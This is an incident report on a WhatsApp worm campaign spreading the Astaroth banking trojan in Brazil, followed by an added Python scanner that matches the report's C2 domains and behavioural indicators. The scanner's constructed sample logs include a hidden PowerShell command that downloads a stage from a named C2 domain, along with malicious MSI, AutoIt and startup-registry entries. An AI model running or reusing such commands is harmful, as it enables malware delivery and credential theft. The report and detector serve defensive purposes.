Another campaign targeting WhatsApp users in Brazil spreads like a worm and employs multiple payloads for credential theft, session hijacking, and persistence
# Incident Report: WhatsApp Worm Spreading Astaroth Banking Trojan
## Executive Summary
A persistent, multi-stage malware campaign (STAC3150) targeted WhatsApp users, primarily in Brazil, spreading via worm-like functionality through shared archive attachments. The attack chain leveraged PowerShell and Python scripts to steal WhatsApp session data and contacts, ultimately deploying the Astaroth (Guildma) banking trojan for credential theft and persistence. Over 250 customers were affected, necessitating immediate user education and the deployment of updated security signatures.
## Incident Details
- **Discovery Date:** September 24, 2025 (First observation of campaign activity)
- **Incident Date:** September 24, 2025 – Late October 2025
- **Affected Organization:** Undisclosed (Report covers detections across Sophos customers)
- **Sector:** General Users/Consumer (Infected via social engineering)
- **Geography:** Brazil (Approx. 95% of impacted devices), with secondary infections in other Latin American countries, the U.S., and Austria.
## Timeline of Events
### Initial Access
- **Date/Time:** Starting September 24, 2025
- **Vector:** Social Engineering via WhatsApp messaging, masquerading as a legitimate conversation.
- **Details:** Attackers sent victims a message using WhatsApp's "View Once" feature, luring them to open a ZIP archive attachment. This archive contained a malicious VBS or HTA file.
### Lateral Movement
- **Date/Time:** Early October 2025 onward (Progression observed)
- **Vector:** Worm-like distribution through collected contacts.
- **Details:** PowerShell or Python scripts harvested WhatsApp contact information and session data, then used the harvested contacts to send the initial malicious lure to new victims.
### Data Exfiltration/Impact
- **Date/Time:** Ongoing during infection lifecycle
- **Impact:** Credential theft via the deployed Astaroth banking trojan, WhatsApp session hijacking, and mass collection of contact information.
- **Details:** The final payload, Astaroth, communicated with a C2 server (`manoelimoveiscaioba[.]com`) after being installed via an MSI package and executed via a malicious AutoIt script.
### Detection & Response
- **Date/Time:** Throughout the campaign (Sophos analysts actively tracking post-Sept 24)
- **Discovery Mechanism:** Sophos analysts and researchers observed and tracked the multi-stage progression.
- **Response actions taken:** SophosLabs developed and deployed countermeasures/detections (listed in Table 1) to identify the various stages of the threat, including VBS downloaders, MSI payloads, and the AutoIt execution.
## Attack Methodology
- **Initial Access:** Malicious VBS or HTA file delivered via encrypted WhatsApp ZIP archive attachment.
- **Persistence:** Astaroth installer created a startup registry key to maintain persistence post-execution.
- **Privilege Escalation:** Not explicitly detailed, but deployment of a banking trojan implies sufficient privileges to execute payloads and modify system settings (registry).
- **Defense Evasion:** Use of PowerShell to download subsequent stages, transitioning from IMAP retrieval (late September) to HTTP `Invoke-WebRequest` (early October) targeting threat intelligence feeds. The malicious AutoIt script was disguised as a `.log` file.
- **Credential Access:** Astaroth banking trojan deployment, and session hijacking/token harvesting from WhatsApp Web.
- **Discovery:** WhatsApp contact data collection using Selenium Chrome WebDriver and WPPConnect library.
- **Lateral Movement:** Self-propagation as a worm by leveraging harvested WhatsApp contact lists to send the lure to new victims.
- **Collection:** Harvesting of WhatsApp contact information and session data/tokens.
- **Exfiltration:** Credential and session data exfiltration related to banking activities (via Astaroth).
- **Impact:** Compromise of user credentials and hijacking of messaging sessions.
## Impact Assessment
- **Financial:** Potential financial losses due to banking trojan compromise (Astaroth), though specific costs are not quantified.
- **Data Breach:** Theft of WhatsApp session tokens, contacts, and credentials susceptible to banking fraud.
- **Operational:** Potential disruption to endpoints hosting the Astaroth malware. Reduced operational security due to successful social engineering.
- **Reputational:** Damage to user trust in messaging platform security if attacks persist.
## Indicators of Compromise
- **Network Indicators (Defanged):**
- C2 Domain 1: `varegjopeaks[.]com` (HTTP download server in early October)
- C2 Domain 2: `manoelimoveiscaioba[.]com` (Astaroth C2 server)
- Other Detections: `docsmoonstudioclayworks[.]online`, `shopeeship[.]com`, `miportuarios[.]com`, `borizerefeicoes[.]com`, `clhttradinglimited[.]com`, `lefthandsuperstructures[.]com`
- **File Indicators:**
- Initial files: Malicious VBS or HTA.
- Second stage: PowerShell or Python scripts automating WhatsApp Web (Selenium WebDriver, WPPConnect).
- Final payload: MSI installer (`installer.msi`) and AutoIt script masquerading as a `.log` file.
- **Behavioral Indicators:**
- Execution of PowerShell fetching content via IMAP or HTTP (`Invoke-WebRequest`).
- Use of legitimate libraries (Selenium WebDriver, WPPConnect) for browser automation/session hijacking.
- Creation of startup registry keys for Astaroth persistence.
## Response Actions
- **Containment Measures:** The primary containment action cited was updating endpoint security definitions (the Sophos detections listed in Table 1) to block known malicious files and associated network traffic.
- **Eradication Steps:** Though not explicitly detailed as a complete IR process, eradication relies on removing the MSI and AutoIt payloads and deleting the persistence registry key established by Astaroth.
- **Recovery Actions:** Recovery involves credential resets for compromised accounts and ensuring all affected endpoints have the latest security signatures deployed.
## Lessons Learned
- **Multi-stage payload delivery:** Attackers effectively chained VBS/HTA execution with subsequent retrieval of complex automation scripts (Selenium/WPPConnect) and the final banking trojan.
- **Worm-like spread:** Use of compromised systems to automatically pivot to the victim’s social graph (WhatsApp contacts) significantly increased the campaign's reach.
- **Evolving C2 infrastructure:** The campaign quickly shifted from IMAP retrieval to HTTP-based C2 communication, demonstrating adaptability by the threat actors.
## Recommendations
- **User Education:** Organizations must rigorously educate employees on the extreme dangers of opening archive attachments from *any* source on social media or instant messaging platforms, even when sent by seemingly known contacts.
- **Endpoint Detection:** Ensure EDR/antivirus solutions are configured to actively monitor and block the execution patterns identified (e.g., unusual PowerShell usage pulling external content, AutoIt scripts disguised as `.log` files).
- **Network Monitoring:** Implement strong monitoring for outbound connections to newly registered or suspicious domains identified as C2 infrastructure, especially HTTP GET/POST requests initiated by scripting engines such as PowerShell.
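As an added example (not code from the Sophos report or from SophosLabs), the script below turns the network and behavioural indicators listed in the Indicators of Compromise section into a small log scanner of the kind the Endpoint Detection and Network Monitoring recommendations call for. The domains are copied from the report's defanged list and refanged for matching; the `key=value` event format, the file paths, the user name and the use of a `CurrentVersion\Run` key as the report's "startup registry key" are assumptions, and the sample log lines are constructed for illustration.

```python
"""Added example (not code from the Sophos report): scan constructed log
lines for the network and behavioural indicators this report lists.
The domains come from the report's defanged IoC list; the log format,
file paths and the Run key used as the 'startup registry key' are assumed."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Defanged domains copied from the Indicators of Compromise section.
DEFANGED_C2 = [
    "varegjopeaks[.]com",
    "manoelimoveiscaioba[.]com",
    "docsmoonstudioclayworks[.]online",
    "shopeeship[.]com",
    "miportuarios[.]com",
    "borizerefeicoes[.]com",
    "clhttradinglimited[.]com",
    "lefthandsuperstructures[.]com",
]


def refang(domain: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()


C2_DOMAINS = {refang(d) for d in DEFANGED_C2}

# Behavioural indicators from the report, expressed as regexes over an
# assumed "key=value" process/registry event format (constructed).
BEHAVIOUR_RULES = [
    # PowerShell pulling a later stage over HTTP with Invoke-WebRequest
    ("powershell_web_download",
     re.compile(r"image=\S*powershell\S*.*invoke-webrequest", re.I)),
    # AutoIt interpreter handed a script that is named like a .log file
    ("autoit_log_masquerade",
     re.compile(r"image=\S*autoit\S*.*cmdline=.*\.log\b", re.I)),
    # MSI package named installer.msi passed to msiexec
    ("msi_installer_drop",
     re.compile(r"image=\S*msiexec\S*.*installer\.msi", re.I)),
    # Startup persistence; the Run key is an assumption, the report only
    # says "startup registry key"
    ("run_key_persistence",
     re.compile(r"registry=.*\\CurrentVersion\\Run\\", re.I)),
]


@dataclass
class Hit:
    line_no: int
    rule: str
    detail: str


def host_of(line: str) -> Optional[str]:
    """Extract the destination host from a proxy/DNS style line (dst=...)."""
    m = re.search(r"\bdst=([A-Za-z0-9.-]+)", line)
    return m.group(1).lower() if m else None


def is_c2(host: str) -> bool:
    """True for an exact match or a subdomain of a listed C2 domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def scan(lines: Iterable[str]) -> List[Hit]:
    """Return every indicator match found in the given log lines, in order."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        host = host_of(line)
        if host and is_c2(host):
            hits.append(Hit(n, "c2_domain", host))
        for name, rx in BEHAVIOUR_RULES:
            if rx.search(line):
                hits.append(Hit(n, name, line.strip()))
    return hits


# Constructed sample events; paths, user name and timestamps are invented.
SAMPLE_LOGS = [
    r'2025-10-02T13:04:11Z proxy user=alice dst=varegjopeaks.com method=GET uri=/x',
    r'2025-10-02T13:04:12Z proxy user=alice dst=www.example.com method=GET uri=/',
    r'2025-10-02T13:04:20Z proc image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden Invoke-WebRequest http://varegjopeaks.com/x"',
    r'2025-10-02T13:05:01Z proc image=C:\Windows\System32\msiexec.exe cmdline="msiexec /i C:\Users\alice\AppData\Local\Temp\installer.msi /qn"',
    r'2025-10-02T13:05:30Z proc image=C:\ProgramData\tool\AutoIt3.exe cmdline="AutoIt3.exe C:\ProgramData\tool\update.log"',
    r'2025-10-02T13:05:31Z reg registry=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc value=C:\ProgramData\tool\AutoIt3.exe',
    r'2025-10-02T13:06:00Z proxy user=alice dst=manoelimoveiscaioba.com method=POST uri=/c',
    r'2025-10-02T13:06:05Z proc image=C:\Windows\explorer.exe cmdline="explorer.exe"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS):
        print(f"line {h.line_no}: {h.rule}: {h.detail}")
```

Run against the constructed sample, the scanner flags the two proxy lines to listed domains and the four process/registry events that match the report's behavioural indicators, and leaves the benign `example.com` and `explorer.exe` lines alone. Matching subdomains of a listed domain (`is_c2`) rather than only exact hosts is deliberate: a download server is often reached by a hostname under the listed domain, while a plain substring match would also fire on unrelated names that merely contain the string.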